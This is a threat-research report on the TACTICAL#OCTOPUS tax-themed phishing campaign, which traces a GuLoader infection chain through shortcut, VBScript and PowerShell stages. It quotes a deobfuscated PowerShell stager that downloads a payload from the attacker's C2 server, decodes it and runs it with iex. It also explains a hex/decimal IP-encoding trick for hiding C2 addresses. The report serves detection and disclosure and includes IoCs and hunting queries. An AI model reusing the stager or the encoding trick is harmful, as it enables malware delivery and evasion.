By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov
March 30, 2023, updated April 5, 2023, updated April 18, 2023
While today is the last day for US income tax submissions, the TACTICAL#OCTOPUS campaign continues to target US victims. New samples have once again emerged related to this ongoing threat.
The GuLoader/CloudEyE malware appears to be the primary malware used to deliver other payloads. Interestingly enough, most of the heavily obfuscated stagers that the Threat Research team tracked initially, were no longer used. Instead, the shortcut file downloads and executes the GuLoader malware directly.
Like the original infection stage, the malware is delivered to the user via a phishing email using tax-themed lures. The email contains an attached zip file containing the shortcut containing the malicious script which looks similar to the original.
Figure u_1: Lnk execution
The GuLoader malware is downloaded from hxxps://rebrand[.]ly/spf5wcc and saved as C:WindowsTasksRestler.com, and the lure document is downloaded from hxxps://rebrand[.]ly/uvhzh3f and saved as C:UsersPublicinfo.pdf.
The malware along with the lure document are executed simultaneously. Per usual, the lure document is another tax-related file.
Figure u_2: lure document
Once the GuLoader binary launches, it sleeps for roughly 30 to 60 seconds and then performs process hollowing to one of two IE utilities, the Internet Explorer Low-MIC Utility Tool, ielowutil.exe or ieinstal.exe as we saw previously.
Figure u_3: GuLoader process hollowing to ieisntal.exe
Without going into too much detail, the malware eventually connects back to hxxp://rebrand[.]ly/spf5wcc to download further stagers as well as for persistence.
The Securonix Threat Research Team is keeping a close eye on the TACTICAL#OCTOPUS campaign and will provide updates as we learn more. It’s possible that with the tax season wrapping up in the US that this campaign might shift away from tax-themed lures.
Additional payloads
| File Name | SHA256 (IoC) |
| Shortcut Files | |
| FedTaxUS.pdf.lnk | 3fc89d5e3e55c0942c6093eef47d87da6c52d6c459a1ad385ae425bd70863b42 |
| Zip Files (email attachments) | |
| FedTaxUS20&21.zip | 6a45856a160185b57a2e0c059f7eced75d3117a2ead0d75c649b50d9077bdf7f |
| Binary Files | |
| Sinsring Lnningsraadenes.exe | 3a76d26eb6d4267c47730b002111153f17deb9ae39bbaedacc1caa7c49d1447e
4d0ebfef45b40e93ec400103685032aadcb2f3427a8a2faa9a70db31bd7e81eb |
Update: TACTICAL#OCTOPUS campaign continues as more malicious phishing documents emerge
Since the discovery of the TACTICAL#OCTOPUS campaign, the Securonix Threat Research team has been monitoring this ongoing threat and has uncovered additional related samples and payloads. The most recent of these samples were submitted 04/04/2023.
Overall, the attack chain appears to have remained the same. A phishing email with a password-protected zip file is delivered to the target using tax-themed lures. However, one noticeable difference is that the attackers have shifted from encoded IP addresses to using known, publicly available URL redirect services, in particular rebrand[.]ly. At the time of writing, the redirect URLs have been blocked by the redirect service.
At this point in time it is safe to assume that the TACTICAL#OCTOPUS campaign is still ongoing and will likely continue (or shift gears) once the tax season in the US wraps up for the April 18th deadline. We will continue to monitor the situation and provide updates as we learn more.
Additional payloads
| File Name | SHA256 (IoC) |
|---|---|
| Shortcut Files | |
| WINSTON_TAXARCHIVE.pdf.lnk | 29201f916b42e013f24a8a0b2543c25ec04e119b4d0969ddd8aff696f84af7ee |
| FedTaxUS.pdf.lnk | de78ba7cedda5de72f399a0bd7b597e880ebd517144bbeb2dd0a4e12d353d749 |
| CLIENTCOPY.pdf.lnk | fd90d38b7ba7a28b3416c917f8e1f1a670e861fecb9d7402b1aea76ac380589a |
| SharonYarbrough.pdf.lnk | d739b7a71406d2bc16e579db6edab6c12bc26dab43b0b293e5bd817a185c7b43 |
| Zip Files (email attachments) | |
| JHNGLE8879.zip | 95d7840b69fb0e9541422fa841389992e19b3502ee59ad6ad86449211f3b8407 |
| SharonYarbrough.zip | 7c5a0ee020e8fb14be5955ee7231191b61f3e077edf638304b046f7d780663bc |
| C2-hosted files | |
| WATPCSP.dll | a5ac856ce08f5526b013044067e1e74ce5aedf695a4a964025349059800ea763 |
tl;dr
As the tax deadline on April 15 approaches in the US, threat actors are ramping up tax-related phishing scams to US-based victims to infect systems with stealthy malware.
With tax season in the US drawing to a close, threat actors are showing no sign of slowing down. The Securonix Threat Research team has identified an ongoing hyper-targeted phishing campaign (tracked by Securonix Threat Research as TACTICAL#OCTOPUS) targeting individuals in the US using seemingly valid tax forms and contracts. Some of the lure documents observed contained employee W-2 tax documents, I-9, and real estate purchase contracts.
However, behind the lure document attachment is interesting malware which features stealthy AV evasion tactics, layers of code obfuscation and multiple C2 (command and control) channels. In this article, we’ll walk through the stages and peel back the obfuscated code to get a better understanding of the malware and attack chain.
Attack chain overview
The attack begins with tax-related phishing emails. The email will contain a password-protected zip file, where the password is provided in the body of the email. The attachments follow a common naming convention using tax-like language such as TitleContractDocs.zip or JRCLIENTCOPY3122.zip.
Contained within the .zip file is a single image file (typically a .png file) and a shortcut (.lnk) file. Code execution begins when the user double clicks the shortcut file.
Once code execution begins, a series of VBScript and PowerShell stagers pull further payloads from the C2 server. Eventually we’ll observe in-memory binary code execution through PowerShell reflection techniques using legitimate Windows processes.
Stage 1: initial infection
Code execution begins when the victim user extracts the .zip file contents and executes the shortcut file masquerading as a .pdf link “MOREZT TAX FILES.pdf.lnk”. As seen in the figure below, the .lnk file contains a PowerShell one liner command that downloads the Visual Basic file “Sammenstyrtningens242.vbs” from the attacker’s C2 server, saves it locally as “C:WindowsTasksTepolerd.vbs” and then runs it.
Figure 1: TACTICAL#OCTOPUS shortcut file information including executed command line
…encoded IP addresses?
Hold up, let’s pause for a second and talk about that odd looking URL. Believe it or not, it is simply an encoded IP address and there is no DNS resolution of any kind happening behind the scenes. This IP address obfuscation method is documented, but rarely used especially when it comes to mixed notation; however, some IP obfuscation tools can be found online. If you were to copy the URL into your browser or terminal window, you’ll notice that it will be automatically translated into an IP. Let’s describe how this works using a known safer example (Open DNS): 208.67.222.123
The value is essentially a combination of hexadecimal and decimal encoding of an IP address. The first IP octet is encoded using hex, separated by a dot. The remaining octets are then decimal encoded.
0xD0.4447867 essentially translates to 208.67.222.123
The IP address used by the attacker’s .lnk code: 0x05.526436 becomes 5.8.8[.]100
Oddly enough, this method to hide IP addresses only works where at least the first octet is hex encoded. Decimal encoding the first octet with hex proceeding will not work. The graphic below breaks this down with some examples:
Figure 2: Encoded URL examples
Continuing on, the PowerShell script also downloads a file called “info.pdf” and saves it to the local public user’s directory in “C:UsersPublicinfos.pdf”. Once downloaded it is then opened and presented to the user from whatever application is configured as the default PDF viewer.
All the file samples our team analyzed were various forms of tax documents, though none could be verified as being valid. These ranged from several employee W-2 forms to I-9 documents, to real estate contracts. The two W-2 tax forms below appear to be from an Okta employee and another employee of Murray Logan Electricals and Wiring.
These documents are known as lure documents to provide the victim user with an expected result to the action taken (opening a “PDF” file). Even though the goal of the attacker is code execution, a user may get suspicious when nothing happens, hence the need for a valid lure.
Figure 3: A sample of various lure documents
Next, let’s circle back to the downloaded .VBS script that gets downloaded and executed just before the lure document opens.
Stage 2: VBS script execution
The VBS script that gets executed from the shortcut file, “Sammenstyrtningens242.vbs” is heavily obfuscated. It contains mostly nonsensical comments, likely to try to bypass or confuse AV detection.
Figure 4: Obfuscated VBScript example
As you can see in the figure above, there is a concatenated PowerShell script contained within the VB script file. This gets executed by the default PowerShell.exe process.
Stage 3: PowerShell execution
The obfuscation methods used in this PowerShell script are a bit unconventional. It involves a function that manipulates any string called into it. Each of the strings (represented in green) are passed into the function “Unrhe9” and converted into valid PowerShell syntax that can then be executed.
Figure 5: Obfuscated PowerShell script extracted from VB code
The deobfuscated version of the PowerShell script gives us a bit better understanding as to the script’s intent. Overall, the script is quite interesting due to the fact that each line gets invoked individually. Technically, the invokes could be dropped to further enhance readability.
Figure 6: Deobfuscated PowerShell script
Compounding the variables in the deobfuscated version of the script we get the final few commands that kick off the next phase of code execution.
Start-BitsTransfer -Source “hxxp://5.8.8[.]100/signal/Traverser.dwp” -Destination $env:appdataKommaerp.ema
$Unrhe = Get-Content $env:appdataKommaerp.ema
$Moatingh = [System.Convert]::FromBase64String($Unrhe));
$Told2 = [System.Text.Encoding]::ASCII.GetString($Moatingh))
$Astrologi=$Told2.substring(183983,19725));
iex($Astrologi)
The same C2 server is now contacted once again to download the file Kommaerp.ema and save it to the user’s Appdata directory (“C:UsersusernameAppDataRoaming”). The file is downloaded using the Start-BitsTransfer PowerShell module.
The Kommaerp.ema file contains a giant Base64 string that gets decoded and parsed by the next few lines of code. The last line simply invokes whatever contained PowerShell code is present as a result as represented by the $Astrologi variable.
Stage 4: PowerShell execution
The next phase of PowerShell execution is derived from the $Astrologi variable as we discovered in the previous stage. Once again, we see another massively obfuscated script as shown in the figure below.
Figure 7: Stage4 obfuscated PowerShell script
Similar to what we saw in stage 3, obfuscation is mainly handled by a primary function that decodes all of the passed in strings throughout the remainder of the script. Manually deobfuscating the strings using the “Elkaunq02” function makes the PowerShell script a bit more readable.
Figure 8: Stage 4 deobfuscated PowerShell script in-memory binary execution
If you’re familiar with PowerShell in-memory code execution, the code above should look familiar. Similar versions of the same code have been seen in the wild executing a wide range of attacks from Cobalt Strike, to a wide range of backdoor RAT malware including Kovter. It essentially leverages .NET API functionality to allocate memory space for a payload that will be executed within the new memory space.
A new thread is then spawned from our original process containing the payload data. The data in this case is contained inside the $Moatingh variable. This variable was instantiated during stage 3 of the attack. If you look back, you’ll notice the variable is set to the Base64 decoded value of the download file “Kommaerp.ema”.
$Coerciona2=$env:appdata
$Coerciona2=$Coerciona2+’Kommaerp.ema’
$Unrhe = Get-Content $Coerciona2
$Moatingh = [System.Convert]::FromBase64String($Unrhe));
The second half of the file contains the obfuscated stage 4 PowerShell code which we analyzed in the previous section.
Binary payload analysis
The Windows binary file ieinstal.exe ends up being the victim process for our in-memory process injection technique. This default Windows process is located in C:Program Files (x86)Internet Explorer and is responsible for installing and managing Internet Explorer add-ons.
In the below figure we’re able to observe the malware migrating from PowerShell and launching ieinstal.exe which then spawns its own thread. The shell code used to inject the process contained within the Kommaerp.ema file is heavily obfuscated at a binary level, however we’ll get into how we’re able to gather some interesting data from the created process.
Figure 9: Procmon: PowerShell to ieinstal.exe process
ieinstal.exe memory dump analysis
Examining the process dump file for ieinstal.exe provides some interesting insights. First, we observed C2 communication back to the original IP address (5.8.8[.]100) from the infected process. Analyzed data within the memory dump confirms that the IP is contacted using the following parameters:
GET /signal/TpRIfutRxWlhn224.dwp HTTP/1.1
User-AgentMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
At this stage, the infection chain is completed and the attackers will have access to the target system. Without pulling additional files from the C2 server, we observed ieinstal.exe capturing clipboard data and keystrokes as soon as it started running.
Additional sample analysis
In addition to the sample featured in this article, we identified several additional samples following the same pattern using unique IP addresses and URL strings. Overall, each sample followed striking similarities such as the tax related PDF (always info.pdf), and PowerShell/VBScript code.
All files and hashes will be provided at the end of the article for references or IoCs.
C2 infrastructure and attribution
Two of three IP addresses identified in the attack were registered to Petersburg Internet Network Ltd. in the Russian Federation. This could indicate Russian origins, however the possibility of false flag operations cannot be ruled out at this point.
| C2 domains/IPs |
| hxxp://109.206.240[.]67/oy/ |
| tcp://goodisgood[.]ru:1977 |
| hxxps://rebrand[.]ly/25a1ba |
| hxxps://rebrand[.]ly/be263e |
| hxxps://rebrand[.]ly/m526mvn |
| hxxps://rebrand[.]ly/rzuw9uy |
| hxxps://rebrand[.]ly/spf5wcc |
| hxxps://rebrand[.]ly/uvhzh3f |
Conclusion
Since all the samples that Securonix Threat Research identified are fairly recent, it’s clear that this campaign is still ongoing. Businesses and individuals should be extra vigilant when opening tax-related emails, especially as the tax deadline in the US approaches.
The TACTICAL#OCTOPUS campaign is overall relatively complex from an initial compromise standpoint. The initial code execution tactic through .lnk file execution is trivial and used by many threat actors these days. However, the PowerShell and VBScript code used are unique and sophisticated, especially from an AV avoidance and obfuscation standpoint making this campaign important to watch.
Securonix recommendations and mitigations
- Avoid opening any attachments especially those that are unexpected or are from outside the organization. Be extra vigilant with tax-related emails.
- Implement an application whitelisting policy to restrict the execution of unknown binaries.
- Deploy additional process-level logging such as ⦁ Sysmon and ⦁ PowerShel⦁ l logging for additional log detection coverage.
- Securonix customers can scan endpoints using the Securonix Seeder Hunting Queries below.
MITRE ATT&CK Matrix
Analyzed file hashes
A Sample of relevant Securonix detection policies:
- EDR-ALL-1197-RU
- EDR-ALL-1198-RU
- PSH-ALL-227-RU
- PSH-ALL-228-RU
- PSH-ALL-313-RU
Relevant Spotter queries
- index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (destinationprocessname ENDS WITH “powershell.exe” OR filename = “PowerShell.EXE” OR destinationprocessname ENDS WITH “cmd.exe” OR filename = “Cmd.Exe”) AND (resourcecustomfield1 CONTAINS “https://0x” OR resourcecustomfield1 CONTAINS “http://0x”)
- (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR rg_functionality = “Web Proxy”) AND (destinationaddress = “194.180.48[.]211” OR destinationaddress = “5.8.8[.]100” OR destinationaddress = “109.206.240[.]67”)
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS ” -bxor”
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS “System.Reflection.Assembly.Load($” OR message CONTAINS “[System.Reflection.Assembly]::Load($” OR message CONTAINS “[Reflection.Assembly]::Load($” OR message CONTAINS “System.Reflection.AssemblyName” OR message CONTAINS “Reflection.Emit.AssemblyBuilderAccess” OR message CONTAINS “Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS “Generated by= Microsoft Corporation” OR message NOT CONTAINS “Generated by: Microsoft Corporation”)
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “Start-BitsTransfer” AND message CONTAINS “-Source” AND message CONTAINS “-Destination” AND message CONTAINS “http”